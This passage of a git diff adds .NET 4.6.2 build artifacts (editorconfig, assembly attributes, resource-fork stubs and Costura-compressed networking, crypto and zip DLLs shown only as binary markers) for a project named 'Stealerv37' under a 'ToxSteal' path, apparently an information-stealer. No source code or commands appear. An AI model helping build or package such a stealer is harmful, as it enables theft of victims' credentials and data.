global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.2", FrameworkDisplayName = ".NET Framework 4.6.2")] diff --git a/New/obj/Debug/net462/._.NETFramework,Version=v4.6.2.AssemblyAttributes.cs b/New/obj/Debug/net462/._.NETFramework,Version=v4.6.2.AssemblyAttributes.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Debug/net462/._.NETFramework,Version=v4.6.2.AssemblyAttributes.cs differ diff --git a/New/obj/Debug/net462/._Stealerv37.exe.withSupportedRuntime.config b/New/obj/Debug/net462/._Stealerv37.exe.withSupportedRuntime.config new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Debug/net462/._Stealerv37.exe.withSupportedRuntime.config differ diff --git a/New/obj/Debug/net462/._aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig b/New/obj/Debug/net462/._aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Debug/net462/._aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig differ diff --git a/New/obj/Debug/net462/._aoStealerv35_c6.assets.cache b/New/obj/Debug/net462/._aoStealerv35_c6.assets.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Debug/net462/._aoStealerv35_c6.assets.cache differ diff --git a/New/obj/Debug/net462/._aoStealerv35_c6.csproj.AssemblyReference.cache b/New/obj/Debug/net462/._aoStealerv35_c6.csproj.AssemblyReference.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Debug/net462/._aoStealerv35_c6.csproj.AssemblyReference.cache differ diff --git a/New/obj/Debug/net462/._aoStealerv35_c6.csproj.FileListAbsolute.txt b/New/obj/Debug/net462/._aoStealerv35_c6.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Debug/net462/._aoStealerv35_c6.csproj.FileListAbsolute.txt differ diff --git a/New/obj/Debug/net462/Stealerv37.exe.withSupportedRuntime.config b/New/obj/Debug/net462/Stealerv37.exe.withSupportedRuntime.config new file mode 100644 index 0000000..ab21881 --- /dev/null +++ b/New/obj/Debug/net462/Stealerv37.exe.withSupportedRuntime.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/New/obj/Debug/net462/aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig b/New/obj/Debug/net462/aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig new file mode 100644 index 0000000..32bec4c --- /dev/null +++ b/New/obj/Debug/net462/aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig @@ -0,0 +1,14 @@ +is_global = true +build_property.ApplicationManifest = app.manifest +build_property.StartupObject = +build_property.ApplicationDefaultFont = +build_property.ApplicationHighDpiMode = +build_property.ApplicationUseCompatibleTextRendering = +build_property.ApplicationVisualStyles = +build_property.RootNamespace = aoStealerv35_c6 +build_property.ProjectDir = C:\Users\User\Documents\ToxSteal-Standalone Adan tyler\New\ +build_property.EnableComHosting = +build_property.EnableGeneratedComInterfaceComImportInterop = +build_property.CsWinRTUseWindowsUIXamlProjections = false +build_property.EffectiveAnalysisLevelStyle = +build_property.EnableCodeStyleSeverity = diff --git a/New/obj/Debug/net462/aoStealerv35_c6.assets.cache b/New/obj/Debug/net462/aoStealerv35_c6.assets.cache new file mode 100644 index 0000000..86ddc92 Binary files /dev/null and b/New/obj/Debug/net462/aoStealerv35_c6.assets.cache differ diff --git a/New/obj/Debug/net462/aoStealerv35_c6.csproj.AssemblyReference.cache b/New/obj/Debug/net462/aoStealerv35_c6.csproj.AssemblyReference.cache new file mode 100644 index 0000000..e6a3fc2 Binary files /dev/null and b/New/obj/Debug/net462/aoStealerv35_c6.csproj.AssemblyReference.cache differ diff --git a/New/obj/Debug/net462/aoStealerv35_c6.csproj.FileListAbsolute.txt b/New/obj/Debug/net462/aoStealerv35_c6.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/New/obj/Release/._net462 b/New/obj/Release/._net462 new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/._net462 differ diff --git a/New/obj/Release/net462/.NETFramework,Version=v4.6.2.AssemblyAttributes.cs b/New/obj/Release/net462/.NETFramework,Version=v4.6.2.AssemblyAttributes.cs new file mode 100644 index 0000000..393142f --- /dev/null +++ b/New/obj/Release/net462/.NETFramework,Version=v4.6.2.AssemblyAttributes.cs @@ -0,0 +1,4 @@ +// +using System; +using System.Reflection; +[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.2", FrameworkDisplayName = ".NET Framework 4.6.2")] diff --git a/New/obj/Release/net462/._.NETFramework,Version=v4.6.2.AssemblyAttributes.cs b/New/obj/Release/net462/._.NETFramework,Version=v4.6.2.AssemblyAttributes.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._.NETFramework,Version=v4.6.2.AssemblyAttributes.cs differ diff --git a/New/obj/Release/net462/._Costura b/New/obj/Release/net462/._Costura new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._Costura differ diff --git a/New/obj/Release/net462/._Stealerv37.exe b/New/obj/Release/net462/._Stealerv37.exe new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._Stealerv37.exe differ diff --git a/New/obj/Release/net462/._Stealerv37.exe.config b/New/obj/Release/net462/._Stealerv37.exe.config new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._Stealerv37.exe.config differ diff --git a/New/obj/Release/net462/._Stealerv37.exe.withSupportedRuntime.config b/New/obj/Release/net462/._Stealerv37.exe.withSupportedRuntime.config new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._Stealerv37.exe.withSupportedRuntime.config differ diff --git a/New/obj/Release/net462/._Stealerv37.pdb b/New/obj/Release/net462/._Stealerv37.pdb new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._Stealerv37.pdb differ diff --git a/New/obj/Release/net462/._aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig b/New/obj/Release/net462/._aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._aoStealerv35_c6.GeneratedMSBuildEditorConfig.editorconfig differ diff --git a/New/obj/Release/net462/._aoStealerv35_c6.assets.cache b/New/obj/Release/net462/._aoStealerv35_c6.assets.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._aoStealerv35_c6.assets.cache differ diff --git a/New/obj/Release/net462/._aoStealerv35_c6.csproj.AssemblyReference.cache b/New/obj/Release/net462/._aoStealerv35_c6.csproj.AssemblyReference.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._aoStealerv35_c6.csproj.AssemblyReference.cache differ diff --git a/New/obj/Release/net462/._aoStealerv35_c6.csproj.CoreCompileInputs.cache b/New/obj/Release/net462/._aoStealerv35_c6.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._aoStealerv35_c6.csproj.CoreCompileInputs.cache differ diff --git a/New/obj/Release/net462/._aoStealerv35_c6.csproj.FileListAbsolute.txt b/New/obj/Release/net462/._aoStealerv35_c6.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._aoStealerv35_c6.csproj.FileListAbsolute.txt differ diff --git a/New/obj/Release/net462/._aoStealerv35_c6.csproj.Fody.CopyLocal.cache b/New/obj/Release/net462/._aoStealerv35_c6.csproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._aoStealerv35_c6.csproj.Fody.CopyLocal.cache differ diff --git a/New/obj/Release/net462/._aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache b/New/obj/Release/net462/._aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/._aoStealerv35_c6.csproj.Fody.RuntimeCopyLocal.cache differ diff --git a/New/obj/Release/net462/Costura/._00278D53E59026CD8C22889773466FEF27D52BBF.costura.system.net.sockets.dll.compressed.compressed b/New/obj/Release/net462/Costura/._00278D53E59026CD8C22889773466FEF27D52BBF.costura.system.net.sockets.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._00278D53E59026CD8C22889773466FEF27D52BBF.costura.system.net.sockets.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._1E76E6099570EDE620B76ED47CF8D03A936D49F8.costura.newtonsoft.json.dll.compressed.compressed b/New/obj/Release/net462/Costura/._1E76E6099570EDE620B76ED47CF8D03A936D49F8.costura.newtonsoft.json.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._1E76E6099570EDE620B76ED47CF8D03A936D49F8.costura.newtonsoft.json.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._30AE8C8E57BCABE27BA675FA84D4DA6AF3C10EAD.costura.system.globalization.calendars.dll.compressed.compressed b/New/obj/Release/net462/Costura/._30AE8C8E57BCABE27BA675FA84D4DA6AF3C10EAD.costura.system.globalization.calendars.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._30AE8C8E57BCABE27BA675FA84D4DA6AF3C10EAD.costura.system.globalization.calendars.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._413C96C3AE407532DB4C1CE3085A8F99675A8AD4.costura.system.security.cryptography.algorithms.dll.compressed.compressed b/New/obj/Release/net462/Costura/._413C96C3AE407532DB4C1CE3085A8F99675A8AD4.costura.system.security.cryptography.algorithms.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._413C96C3AE407532DB4C1CE3085A8F99675A8AD4.costura.system.security.cryptography.algorithms.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._452039516E53E284D9DB5112CD1D5D50A954C1E2.costura.system.runtime.interopservices.dll.compressed.compressed b/New/obj/Release/net462/Costura/._452039516E53E284D9DB5112CD1D5D50A954C1E2.costura.system.runtime.interopservices.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._452039516E53E284D9DB5112CD1D5D50A954C1E2.costura.system.runtime.interopservices.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._4BEB5C11208AFFAD40BDAC6672A7B0B7B4558E7B.costura.system.security.cryptography.x509certificates.dll.compressed.compressed b/New/obj/Release/net462/Costura/._4BEB5C11208AFFAD40BDAC6672A7B0B7B4558E7B.costura.system.security.cryptography.x509certificates.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._4BEB5C11208AFFAD40BDAC6672A7B0B7B4558E7B.costura.system.security.cryptography.x509certificates.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._4E490D7EC139A6CDE53E3932D3122A48AA379904.costura.system.runtime.interopservices.runtimeinformation.dll.compressed.compressed b/New/obj/Release/net462/Costura/._4E490D7EC139A6CDE53E3932D3122A48AA379904.costura.system.runtime.interopservices.runtimeinformation.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._4E490D7EC139A6CDE53E3932D3122A48AA379904.costura.system.runtime.interopservices.runtimeinformation.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._5340B1FC77E793D1FDDE49B14B7B426D0E448870.costura.system.diagnostics.tracing.dll.compressed.compressed b/New/obj/Release/net462/Costura/._5340B1FC77E793D1FDDE49B14B7B426D0E448870.costura.system.diagnostics.tracing.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._5340B1FC77E793D1FDDE49B14B7B426D0E448870.costura.system.diagnostics.tracing.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._629CE95C12B21678D877359EC4552D431C1CFBAB.costura.system.io.compression.dll.compressed.compressed b/New/obj/Release/net462/Costura/._629CE95C12B21678D877359EC4552D431C1CFBAB.costura.system.io.compression.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._629CE95C12B21678D877359EC4552D431C1CFBAB.costura.system.io.compression.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._62A622557CC0D6FCED9C1A14BE28DBC39E9BD6FC.costura.system.security.cryptography.primitives.dll.compressed.compressed b/New/obj/Release/net462/Costura/._62A622557CC0D6FCED9C1A14BE28DBC39E9BD6FC.costura.system.security.cryptography.primitives.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._62A622557CC0D6FCED9C1A14BE28DBC39E9BD6FC.costura.system.security.cryptography.primitives.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._6C6000A5EAF8579850AB82A89BD6268776EB51AD.costura.costura.pdb.compressed.compressed b/New/obj/Release/net462/Costura/._6C6000A5EAF8579850AB82A89BD6268776EB51AD.costura.costura.pdb.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._6C6000A5EAF8579850AB82A89BD6268776EB51AD.costura.costura.pdb.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._6D344A09471D8B4B849F16B0EEBBAFF8688A17CE.costura.system.net.http.dll.compressed.compressed b/New/obj/Release/net462/Costura/._6D344A09471D8B4B849F16B0EEBBAFF8688A17CE.costura.system.net.http.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._6D344A09471D8B4B849F16B0EEBBAFF8688A17CE.costura.system.net.http.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._765C9E4D36B4F2986514C1AB24B5E5E56AFFF448.costura.system.xml.readerwriter.dll.compressed.compressed b/New/obj/Release/net462/Costura/._765C9E4D36B4F2986514C1AB24B5E5E56AFFF448.costura.system.xml.readerwriter.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._765C9E4D36B4F2986514C1AB24B5E5E56AFFF448.costura.system.xml.readerwriter.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._7E549944512DE844B49AAD4B9D4A9547C06EDE37.costura.system.runtime.dll.compressed.compressed b/New/obj/Release/net462/Costura/._7E549944512DE844B49AAD4B9D4A9547C06EDE37.costura.system.runtime.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._7E549944512DE844B49AAD4B9D4A9547C06EDE37.costura.system.runtime.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._8374975CA07A300021EF0ACAA4F908D5BFB102FB.costura.system.io.filesystem.primitives.dll.compressed.compressed b/New/obj/Release/net462/Costura/._8374975CA07A300021EF0ACAA4F908D5BFB102FB.costura.system.io.filesystem.primitives.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._8374975CA07A300021EF0ACAA4F908D5BFB102FB.costura.system.io.filesystem.primitives.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._85DC92EDD4B0049ED9049E075C4DEF8A3D64E43B.costura.system.diagnostics.diagnosticsource.dll.compressed.compressed b/New/obj/Release/net462/Costura/._85DC92EDD4B0049ED9049E075C4DEF8A3D64E43B.costura.system.diagnostics.diagnosticsource.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._85DC92EDD4B0049ED9049E075C4DEF8A3D64E43B.costura.system.diagnostics.diagnosticsource.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._99D6C187DE8510206A93D2EED9C65E65E0C86E72.costura.system.io.compression.zipfile.dll.compressed.compressed b/New/obj/Release/net462/Costura/._99D6C187DE8510206A93D2EED9C65E65E0C86E72.costura.system.io.compression.zipfile.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._99D6C187DE8510206A93D2EED9C65E65E0C86E72.costura.system.io.compression.zipfile.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._9C6772A60E6464208A491A2CB55D62C8F3C67D00.costura.system.runtime.extensions.dll.compressed.compressed b/New/obj/Release/net462/Costura/._9C6772A60E6464208A491A2CB55D62C8F3C67D00.costura.system.runtime.extensions.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._9C6772A60E6464208A491A2CB55D62C8F3C67D00.costura.system.runtime.extensions.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._A0F2C03CB813317460133DE80231D7B1FB62DCC5.costura.system.security.cryptography.encoding.dll.compressed.compressed b/New/obj/Release/net462/Costura/._A0F2C03CB813317460133DE80231D7B1FB62DCC5.costura.system.security.cryptography.encoding.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._A0F2C03CB813317460133DE80231D7B1FB62DCC5.costura.system.security.cryptography.encoding.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._AFA308C0166D8CBDD1D5E6FDAA8C9B87EB9184E7.costura.microsoft.win32.primitives.dll.compressed.compressed b/New/obj/Release/net462/Costura/._AFA308C0166D8CBDD1D5E6FDAA8C9B87EB9184E7.costura.microsoft.win32.primitives.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._AFA308C0166D8CBDD1D5E6FDAA8C9B87EB9184E7.costura.microsoft.win32.primitives.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._B46AD93384323ED4AA88E8AF3CDEE208A88F1F6D.costura.system.io.filesystem.dll.compressed.compressed b/New/obj/Release/net462/Costura/._B46AD93384323ED4AA88E8AF3CDEE208A88F1F6D.costura.system.io.filesystem.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._B46AD93384323ED4AA88E8AF3CDEE208A88F1F6D.costura.system.io.filesystem.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._B5102629939EBDD4BCD0F407A92828DEE5F2B565.costura.system.console.dll.compressed.compressed b/New/obj/Release/net462/Costura/._B5102629939EBDD4BCD0F407A92828DEE5F2B565.costura.system.console.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._B5102629939EBDD4BCD0F407A92828DEE5F2B565.costura.system.console.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._B830E365EFC12167714E591DC7C1DD0A623FCA48.costura.system.reflection.dll.compressed.compressed b/New/obj/Release/net462/Costura/._B830E365EFC12167714E591DC7C1DD0A623FCA48.costura.system.reflection.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._B830E365EFC12167714E591DC7C1DD0A623FCA48.costura.system.reflection.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._BA5F2CAA404AE9A283A841C08B024BAF8817BA01.costura.system.io.dll.compressed.compressed b/New/obj/Release/net462/Costura/._BA5F2CAA404AE9A283A841C08B024BAF8817BA01.costura.system.io.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._BA5F2CAA404AE9A283A841C08B024BAF8817BA01.costura.system.io.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._C9A0C7200AD55960A1E1824B04718CBF6CA84581.costura.system.appcontext.dll.compressed.compressed b/New/obj/Release/net462/Costura/._C9A0C7200AD55960A1E1824B04718CBF6CA84581.costura.system.appcontext.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._C9A0C7200AD55960A1E1824B04718CBF6CA84581.costura.system.appcontext.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/._F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906.costura.costura.dll.compressed.compressed b/New/obj/Release/net462/Costura/._F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906.costura.costura.dll.compressed.compressed new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Release/net462/Costura/._F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906.costura.costura.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/00278D53E59026CD8C22889773466FEF27D52BBF.costura.system.net.sockets.dll.compressed.compressed b/New/obj/Release/net462/Costura/00278D53E59026CD8C22889773466FEF27D52BBF.costura.system.net.sockets.dll.compressed.compressed new file mode 100644 index 0000000..ea5cc4a Binary files /dev/null and b/New/obj/Release/net462/Costura/00278D53E59026CD8C22889773466FEF27D52BBF.costura.system.net.sockets.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/1E76E6099570EDE620B76ED47CF8D03A936D49F8.costura.newtonsoft.json.dll.compressed.compressed b/New/obj/Release/net462/Costura/1E76E6099570EDE620B76ED47CF8D03A936D49F8.costura.newtonsoft.json.dll.compressed.compressed new file mode 100644 index 0000000..cbeda9e Binary files /dev/null and b/New/obj/Release/net462/Costura/1E76E6099570EDE620B76ED47CF8D03A936D49F8.costura.newtonsoft.json.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/30AE8C8E57BCABE27BA675FA84D4DA6AF3C10EAD.costura.system.globalization.calendars.dll.compressed.compressed b/New/obj/Release/net462/Costura/30AE8C8E57BCABE27BA675FA84D4DA6AF3C10EAD.costura.system.globalization.calendars.dll.compressed.compressed new file mode 100644 index 0000000..a537f4c Binary files /dev/null and b/New/obj/Release/net462/Costura/30AE8C8E57BCABE27BA675FA84D4DA6AF3C10EAD.costura.system.globalization.calendars.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/413C96C3AE407532DB4C1CE3085A8F99675A8AD4.costura.system.security.cryptography.algorithms.dll.compressed.compressed b/New/obj/Release/net462/Costura/413C96C3AE407532DB4C1CE3085A8F99675A8AD4.costura.system.security.cryptography.algorithms.dll.compressed.compressed new file mode 100644 index 0000000..7ed4f9f Binary files /dev/null and b/New/obj/Release/net462/Costura/413C96C3AE407532DB4C1CE3085A8F99675A8AD4.costura.system.security.cryptography.algorithms.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/452039516E53E284D9DB5112CD1D5D50A954C1E2.costura.system.runtime.interopservices.dll.compressed.compressed b/New/obj/Release/net462/Costura/452039516E53E284D9DB5112CD1D5D50A954C1E2.costura.system.runtime.interopservices.dll.compressed.compressed new file mode 100644 index 0000000..caad6ac Binary files /dev/null and b/New/obj/Release/net462/Costura/452039516E53E284D9DB5112CD1D5D50A954C1E2.costura.system.runtime.interopservices.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/4BEB5C11208AFFAD40BDAC6672A7B0B7B4558E7B.costura.system.security.cryptography.x509certificates.dll.compressed.compressed b/New/obj/Release/net462/Costura/4BEB5C11208AFFAD40BDAC6672A7B0B7B4558E7B.costura.system.security.cryptography.x509certificates.dll.compressed.compressed new file mode 100644 index 0000000..579986c Binary files /dev/null and b/New/obj/Release/net462/Costura/4BEB5C11208AFFAD40BDAC6672A7B0B7B4558E7B.costura.system.security.cryptography.x509certificates.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/4E490D7EC139A6CDE53E3932D3122A48AA379904.costura.system.runtime.interopservices.runtimeinformation.dll.compressed.compressed b/New/obj/Release/net462/Costura/4E490D7EC139A6CDE53E3932D3122A48AA379904.costura.system.runtime.interopservices.runtimeinformation.dll.compressed.compressed new file mode 100644 index 0000000..0235f13 Binary files /dev/null and b/New/obj/Release/net462/Costura/4E490D7EC139A6CDE53E3932D3122A48AA379904.costura.system.runtime.interopservices.runtimeinformation.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/5340B1FC77E793D1FDDE49B14B7B426D0E448870.costura.system.diagnostics.tracing.dll.compressed.compressed b/New/obj/Release/net462/Costura/5340B1FC77E793D1FDDE49B14B7B426D0E448870.costura.system.diagnostics.tracing.dll.compressed.compressed new file mode 100644 index 0000000..fd018fa Binary files /dev/null and b/New/obj/Release/net462/Costura/5340B1FC77E793D1FDDE49B14B7B426D0E448870.costura.system.diagnostics.tracing.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/629CE95C12B21678D877359EC4552D431C1CFBAB.costura.system.io.compression.dll.compressed.compressed b/New/obj/Release/net462/Costura/629CE95C12B21678D877359EC4552D431C1CFBAB.costura.system.io.compression.dll.compressed.compressed new file mode 100644 index 0000000..7d26e93 Binary files /dev/null and b/New/obj/Release/net462/Costura/629CE95C12B21678D877359EC4552D431C1CFBAB.costura.system.io.compression.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/62A622557CC0D6FCED9C1A14BE28DBC39E9BD6FC.costura.system.security.cryptography.primitives.dll.compressed.compressed b/New/obj/Release/net462/Costura/62A622557CC0D6FCED9C1A14BE28DBC39E9BD6FC.costura.system.security.cryptography.primitives.dll.compressed.compressed new file mode 100644 index 0000000..c540543 Binary files /dev/null and b/New/obj/Release/net462/Costura/62A622557CC0D6FCED9C1A14BE28DBC39E9BD6FC.costura.system.security.cryptography.primitives.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/6C6000A5EAF8579850AB82A89BD6268776EB51AD.costura.costura.pdb.compressed.compressed b/New/obj/Release/net462/Costura/6C6000A5EAF8579850AB82A89BD6268776EB51AD.costura.costura.pdb.compressed.compressed new file mode 100644 index 0000000..4a9baf3 Binary files /dev/null and b/New/obj/Release/net462/Costura/6C6000A5EAF8579850AB82A89BD6268776EB51AD.costura.costura.pdb.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/6D344A09471D8B4B849F16B0EEBBAFF8688A17CE.costura.system.net.http.dll.compressed.compressed b/New/obj/Release/net462/Costura/6D344A09471D8B4B849F16B0EEBBAFF8688A17CE.costura.system.net.http.dll.compressed.compressed new file mode 100644 index 0000000..2e0d1cd Binary files /dev/null and b/New/obj/Release/net462/Costura/6D344A09471D8B4B849F16B0EEBBAFF8688A17CE.costura.system.net.http.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/765C9E4D36B4F2986514C1AB24B5E5E56AFFF448.costura.system.xml.readerwriter.dll.compressed.compressed b/New/obj/Release/net462/Costura/765C9E4D36B4F2986514C1AB24B5E5E56AFFF448.costura.system.xml.readerwriter.dll.compressed.compressed new file mode 100644 index 0000000..e3865f3 Binary files /dev/null and b/New/obj/Release/net462/Costura/765C9E4D36B4F2986514C1AB24B5E5E56AFFF448.costura.system.xml.readerwriter.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/7E549944512DE844B49AAD4B9D4A9547C06EDE37.costura.system.runtime.dll.compressed.compressed b/New/obj/Release/net462/Costura/7E549944512DE844B49AAD4B9D4A9547C06EDE37.costura.system.runtime.dll.compressed.compressed new file mode 100644 index 0000000..09659be Binary files /dev/null and b/New/obj/Release/net462/Costura/7E549944512DE844B49AAD4B9D4A9547C06EDE37.costura.system.runtime.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/8374975CA07A300021EF0ACAA4F908D5BFB102FB.costura.system.io.filesystem.primitives.dll.compressed.compressed b/New/obj/Release/net462/Costura/8374975CA07A300021EF0ACAA4F908D5BFB102FB.costura.system.io.filesystem.primitives.dll.compressed.compressed new file mode 100644 index 0000000..ba8a8b2 Binary files /dev/null and b/New/obj/Release/net462/Costura/8374975CA07A300021EF0ACAA4F908D5BFB102FB.costura.system.io.filesystem.primitives.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/85DC92EDD4B0049ED9049E075C4DEF8A3D64E43B.costura.system.diagnostics.diagnosticsource.dll.compressed.compressed b/New/obj/Release/net462/Costura/85DC92EDD4B0049ED9049E075C4DEF8A3D64E43B.costura.system.diagnostics.diagnosticsource.dll.compressed.compressed new file mode 100644 index 0000000..b707e52 Binary files /dev/null and b/New/obj/Release/net462/Costura/85DC92EDD4B0049ED9049E075C4DEF8A3D64E43B.costura.system.diagnostics.diagnosticsource.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/99D6C187DE8510206A93D2EED9C65E65E0C86E72.costura.system.io.compression.zipfile.dll.compressed.compressed b/New/obj/Release/net462/Costura/99D6C187DE8510206A93D2EED9C65E65E0C86E72.costura.system.io.compression.zipfile.dll.compressed.compressed new file mode 100644 index 0000000..4117c01 Binary files /dev/null and b/New/obj/Release/net462/Costura/99D6C187DE8510206A93D2EED9C65E65E0C86E72.costura.system.io.compression.zipfile.dll.compressed.compressed differ diff --git a/New/obj/Release/net462/Costura/9C6772A60E6464208A491A2CB55D62C8F3C67D00.costura.system.runtime.extensions.dll.compressed.compressed b/New/obj/Release/net462/Costura/9C6772A60E6464208A491A2CB55D62C8F3C67D00.costura.system.runtime.extensions.dll.compressed.compressed new file mode 100644 index 0000000..99ca8c6 Binary files /dev/null and b/New/obj/Release/net462/Costura/9C6772A60E6464208A491A2CB55D62C8F3C67D00.costura.system.runtime.extensions.dll.compressed.compressed differ diff --git 